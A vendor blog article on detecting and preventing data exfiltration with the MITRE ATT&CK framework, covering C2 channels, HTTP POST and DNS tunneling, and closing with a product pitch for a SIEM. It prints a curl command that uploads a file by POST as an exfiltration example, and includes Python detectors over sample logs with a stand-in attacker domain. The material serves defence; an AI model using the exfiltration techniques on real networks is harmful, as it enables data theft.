Preventing data exfiltration using the MITRE ATT&CK® framework


Data exfiltration is the unauthorized access and retrieval of sensitive data with malicious intentions. This can also lead to stolen and leaked confidential information and ransom demands.

Data exfiltration can result from:

  1. Hackers intruding on the network: External threat actors use methods like phishing, social engineering, and exploitation of web vulnerabilities to target the victim's network and infect it with malware. After compromising the network, gaining access to critical resources through persistence, and establishing a command and control channel, they begin to exfiltrate data. Various tools and software are used to scan the network, steal credentials, and encrypt and compress data before transferring it to external servers.

  2. Malicious insiders: An employee with malicious intent can exfiltrate data much more easily, as they are already in the fourth or fifth phase of the cyber kill chain, possessing the necessary administrative privileges or the ability to escalate their privileges as needed. Insiders are also aware of the organization's security policies, vulnerabilities, and suitable options to exfiltrate data, like sending outbound emails, uploading to the cloud, or transferring to removable devices like hard drives and USBs. Some may even use more covert channels and sophisticated techniques, as external actors do.

  3. Ignorant insiders: Employees unaware of security best practices might unintentionally leak the organization's sensitive information through acts like using insecure public Wi-Fi for work, installing risky software, sharing credentials with other employees, and uploading data to unsafe public clouds. They become victims of social engineering, expose data, and enable malicious actors to pass the initial phases of the cyber kill chain comfortably.

Techniques used for data exfiltration

Data exfiltration is one of the 14 major tactics in the ATT&CK framework. The techniques defined under each tactic form an ever-growing list that gives us insights into the stealthy methods threat actors use to proceed through the different phases of a cyberattack.

The following are some of the common techniques used by attackers listed in the ATT&CK framework for data exfiltration:

Command and Control channel
(ATT&CK technique T1041)

The command and control channel, also known as the C2 channel, is the communication bridge between external adversaries and the compromised network. The malware used to infect the victim's network is encoded with instructions and details to reach out to multiple external servers to receive additional payloads and to transfer the collected data. The C2 traffic is merged with the regular user traffic stream through frequently used ports to avoid raising suspicions. Tools like Attor, Bankshot, and Kessel are used to exfiltrate data through the C2 channel.

Exfiltration through protocols
(ATT&CK technique T1048)

Protocols like DNS, HTTP, HTTPS, and FTP are an integral part of the functioning of the internet and web browsing. The request and response traffic of such protocols bypasses most firewalls by default and is exploited by threat actors. They register new domains, set up rogue websites and DNS servers, and draw the data out of the victim's network by embedding it in the protocol's queries. Some organizations block connections to newly registered domains, in which case threat actors may even hack other websites that the organization's firewalls already allow, and use that permitted outbound traffic.

Use of protocols

HTTP: When users enter data in a website and upload files through forms, the HTTP POST method is used to transfer that data to the web server. A hacker can exfiltrate data to their own server through the same method. This is also very convenient for them, as the limit on the amount of data transferred is set by the receiving server. Command line tools like cURL and HTTP Prompt are used to send data directly through POST requests.

curl -X POST -F "image=@/downloads/image.gif" http://URL/postimage.cgi

In the above command, -X denotes the HTTP method used, -F denotes the form upload (here the file /downloads/image.gif as the form field "image"), and the URL of the site comes last. There are also other flexible options to send data in different formats like JSON and XML.

DNS tunneling: The DNS protocol resolves domain names to IP addresses by forwarding queries to DNS servers in a hierarchical manner, starting with the resolver, then the root server, followed by the top-level domain server, and finally the authoritative name server. To exfiltrate data through the DNS protocol, the data is first segmented into small chunks. This helps stay within data transfer size limits (T1030). The segments are then compressed and encrypted.

The malware in the victim's network sends DNS queries packed with the segmented chunks of data to the rogue authoritative name server (ANS) set up by the hacker. The maximum size of a fully qualified domain name (FQDN) is 255 bytes, and each label within it, such as the subdomain, is limited to 63 bytes; those subdomain bytes are what carry the data. The file or files to be exfiltrated are converted into arrays of strings using encoding techniques and are gradually sent to the external server.

DNS responses used for C2: Domains have associated records like A (IPv4 address), AAAA (IPv6 address), CNAME (canonical name), and MX (mail exchange server). When these records are queried, a large chunk of data can be sent from the ANS as the response. This is used as a C2 channel by replacing the actual record values with instructions to the malware.
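The DNS tunneling description above (data chunks encoded into the leftmost label, many distinct subdomains under one domain, the 63-byte label and 255-byte name limits) translates directly into detection features a SIEM rule or a log-parsing script can compute. The following Python detector is an added example written for this page, not code from the original article or from ManageEngine; it runs over a constructed DNS query log (the domain names, client addresses and hex-looking labels are made up for illustration) and flags registered domains whose queries look like encoded data carriers. The thresholds and the "last two labels" approximation of the registered domain are assumptions; a production detector would use the Public Suffix List and tune thresholds against its own baseline.

```python
import math
from collections import defaultdict

# Constructed sample DNS query log (not real traffic). Fields: time client qname qtype transport.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 www.example.com A udp
2024-05-01T10:00:02Z 10.0.0.5 mail.example.com MX udp
2024-05-01T10:00:03Z 10.0.0.7 4a6f686e20446f65204b65792e.data.attacker-example.net TXT udp
2024-05-01T10:00:03Z 10.0.0.7 5365637265742066696c652063.data.attacker-example.net TXT udp
2024-05-01T10:00:04Z 10.0.0.7 6f6e74656e7473206c696e6520.data.attacker-example.net TXT udp
2024-05-01T10:00:04Z 10.0.0.7 3320616e64206d6f72652e2e2e.data.attacker-example.net TXT udp
2024-05-01T10:00:05Z 10.0.0.9 cdn.example.org A udp
"""

MAX_LABEL_LEN = 63   # RFC 1035: each label is at most 63 bytes
MAX_NAME_LEN = 253   # textual FQDN limit (255 bytes on the wire including length octets)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character: hex/base32/base64 payloads score high, dictionary words low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def exceeds_dns_limits(qname: str) -> bool:
    """True if a query name breaks the per-label or total length limits (malformed or tunnel-encoded)."""
    name = qname.rstrip(".")
    return len(name) > MAX_NAME_LEN or any(len(label) > MAX_LABEL_LEN for label in name.split("."))


def registered_domain(qname: str) -> str:
    """Assumed approximation: the last two labels. Use the Public Suffix List in production."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def parse_line(line: str) -> dict:
    ts, client, qname, qtype, transport = line.split()
    return {"ts": ts, "client": client, "qname": qname, "qtype": qtype, "transport": transport}


def find_tunnel_candidates(log_text: str, min_unique=3, min_entropy=2.8, min_label_len=20) -> dict:
    """Return {registered_domain: stats} for domains whose leftmost labels look like encoded data.

    Thresholds are assumptions for this example: many distinct subdomains, long leftmost labels,
    and high per-label entropy together are the signature of chunked data riding in queries.
    """
    per_domain = defaultdict(lambda: {"subdomains": set(), "entropies": [], "lengths": [], "clients": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        q = parse_line(line)
        first_label = q["qname"].split(".")[0]          # the label that carries a data chunk in a tunnel
        stats = per_domain[registered_domain(q["qname"])]
        stats["subdomains"].add(first_label)
        stats["entropies"].append(shannon_entropy(first_label))
        stats["lengths"].append(len(first_label))
        stats["clients"].add(q["client"])

    flagged = {}
    for dom, s in per_domain.items():
        uniq = len(s["subdomains"])
        mean_entropy = sum(s["entropies"]) / len(s["entropies"])
        mean_len = sum(s["lengths"]) / len(s["lengths"])
        if uniq >= min_unique and mean_entropy >= min_entropy and mean_len >= min_label_len:
            flagged[dom] = {
                "unique_subdomains": uniq,
                "mean_entropy": round(mean_entropy, 2),
                "mean_label_len": round(mean_len, 1),
                "clients": sorted(s["clients"]),
            }
    return flagged


if __name__ == "__main__":
    for dom, stats in find_tunnel_candidates(SAMPLE_DNS_LOG).items():
        print(f"possible DNS tunneling via {dom}: {stats}")
```

On the sample log only attacker-example.net is reported: four distinct, long, high-entropy leftmost labels from a single client, while the ordinary example.com lookups (short, repeated, low-entropy labels) stay below every threshold. The same per-domain statistics, computed over a sliding window and baselined per client, are what a SIEM correlation rule for DNS tunneling needs.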

Apart from these application layer protocols, transport and session layer protocols are also used to exfiltrate data.

Exfiltration to devices in proximity
(ATT&CK technique T1011)

An organization's employee can use methods like copying files to removable storage devices, or radio frequency channels like Bluetooth, to transfer files to their own devices. To do this, they first disconnect the device from the organization's network and connect it to a cellular hotspot or other Wi-Fi outside the organization's control. This helps evade the organization's security policies.

Exfiltration to web applications
(ATT&CK technique T1567)

Both internal and external threat actors can exfiltrate data to code repositories through the use of APIs and command line tools. Repositories like GitHub are trusted and widely used, and large amounts of data can be transferred to them without raising suspicion. The same goes for SaaS applications and cloud services like Google Drive, Google Docs, and Dropbox.

Prevention and detection of data exfiltration

Here are some proactive strategies and detection mechanisms you can implement in your organization to identify and stop data exfiltration attempts:

  • Utilize a SIEM tool to correlate anomalous events caused by malware like sudden increases in internet activities indicating communication with an external command and control channel, new tools and software installed, disabled anti-virus systems, and spikes in system errors.
  • Monitor protocols and outbound traffic: If there's frequent communication with a newly registered or an unlikely domain and POST requests are being sent to it, alerts should be raised and the traffic should be analyzed. DNS normally operates over UDP; if a client's DNS traffic switches to TCP, it indicates a high amount of data being transferred, which can be either a C2 channel or data being exfiltrated.
  • Process monitoring: Detect the execution of malicious command line tools.
  • Use UEBA and file monitoring tools for both internal and external threats. UEBA offers ML-based statistical behavior analysis that can detect abuse of privileged accounts and data exfiltration.
  • Integrate the ATT&CK framework into the organization's cybersecurity strategies: The techniques mentioned in the ATT&CK framework can be used by both the blue team and the red team to detect attacks and to test vulnerabilities.
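The HTTP POST section earlier and the detection bullets above describe three signals a SIEM should correlate per source host: POST requests to domains outside the organization's baseline, the volume of those uploads, and DNS traffic that has switched from UDP to TCP. The Python script below is an added example for this page, not code from the article or from Log360; it runs the three rules over a constructed mix of proxy and DNS log lines (all hosts, domains and byte counts are made up) and raises a correlated alert when one source trips two different rules inside a short window. The baseline domain set, the size threshold and the five-minute window are assumptions to be tuned against real traffic.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs).
#   proxy lines: proxy <time> <src> <method> <host> <bytes_out>
#   dns lines:   dns   <time> <src> <qname> <transport>
SAMPLE_EVENTS = """\
proxy 2024-05-01T09:58:10Z 10.0.0.7 GET www.example.com 512
proxy 2024-05-01T09:59:40Z 10.0.0.7 POST upload.newly-registered-example.io 58720256
dns   2024-05-01T10:00:03Z 10.0.0.7 chunk01.data.attacker-example.net tcp
proxy 2024-05-01T10:01:00Z 10.0.0.5 POST drive.example.com 204800
dns   2024-05-01T10:02:00Z 10.0.0.5 www.example.com udp
proxy 2024-05-01T10:03:00Z 10.0.0.9 POST www.example.com 1024
"""

KNOWN_DOMAINS = {"example.com"}          # assumed baseline: domains seen from this network before
LARGE_POST_BYTES = 10 * 1024 * 1024      # assumed threshold for a "large" upload (10 MiB)
WINDOW = timedelta(minutes=5)            # assumed correlation window per source host


def registered_domain(host: str) -> str:
    """Assumed approximation: the last two labels. Use the Public Suffix List in production."""
    return ".".join(host.rstrip(".").split(".")[-2:])


def parse_event(line: str) -> dict:
    parts = line.split()
    ts = datetime.fromisoformat(parts[1].replace("Z", "+00:00"))
    if parts[0] == "proxy":
        _, _, src, method, host, bytes_out = parts
        return {"kind": "proxy", "ts": ts, "src": src, "method": method,
                "host": host, "bytes_out": int(bytes_out)}
    _, _, src, qname, transport = parts
    return {"kind": "dns", "ts": ts, "src": src, "qname": qname, "transport": transport}


def rule_hits(ev: dict) -> list:
    """Evaluate the individual detection rules against one event; return (rule, severity) pairs."""
    hits = []
    if ev["kind"] == "proxy" and ev["method"] == "POST" \
            and registered_domain(ev["host"]) not in KNOWN_DOMAINS:
        # Upload to a domain outside the baseline; size decides the severity.
        severity = "high" if ev["bytes_out"] >= LARGE_POST_BYTES else "medium"
        hits.append(("post_to_unknown_domain", severity))
    if ev["kind"] == "dns" and ev["transport"] == "tcp":
        # DNS over TCP means responses or queries too large for a normal UDP exchange.
        hits.append(("dns_over_tcp", "low"))
    return hits


def correlate(events_text: str):
    """Return (hits, alerts): per-event rule hits, and one alert per source that trips
    two or more distinct rules within WINDOW (the correlation a SIEM rule would express)."""
    per_src = defaultdict(list)
    hits = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule, severity in rule_hits(ev):
            hits.append({"ts": ev["ts"], "src": ev["src"], "rule": rule, "severity": severity})
            per_src[ev["src"]].append((ev["ts"], rule))

    alerts = []
    for src, items in per_src.items():
        items.sort()
        for ts, _ in items:
            rules_in_window = {r for t, r in items if ts <= t <= ts + WINDOW}
            if len(rules_in_window) >= 2:
                alerts.append({"src": src, "rules": sorted(rules_in_window), "window_start": ts})
                break
    return hits, alerts


if __name__ == "__main__":
    hits, alerts = correlate(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['ts'].isoformat()} {h['src']} {h['rule']} severity={h['severity']}")
    for a in alerts:
        print(f"ALERT {a['src']}: {a['rules']} within {WINDOW} of {a['window_start'].isoformat()}")
```

Only 10.0.0.7 is escalated: its 56 MiB POST to a domain outside the baseline and its DNS-over-TCP query fall within the same five-minute window. The 200 KB POST from 10.0.0.5 to a baseline domain and the UDP lookups generate nothing, which is the point of correlating rather than alerting on each rule alone.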

What you can do to prevent data exfiltration

  1. Practice Zero Trust access and least privilege security models.
  2. Monitor and update firewall rules for both inbound and outbound traffic.
  3. Enable data encryption and backup.
  4. De-authorize device connection to cellular Wi-Fi for workstations with privileged access.
  5. Enforce the use of a VPN.
  6. Educate employees regarding cyber risks and the organization's security policies.
  7. Update applications and software regularly.

ManageEngine Log360, a comprehensive SIEM solution, can help you implement and automate the strategies and best practices mentioned above. Utilize advanced features like real-time network monitoring, correlation, integrated threat feeds, a MITRE ATT&CK dashboard with predefined reports, log forensic analysis, instant alerting, and an incident management system to effectively detect and remediate data exfiltration attempts. Explore the solution now.

  Zoho Corporation Pvt. Ltd. All rights reserved.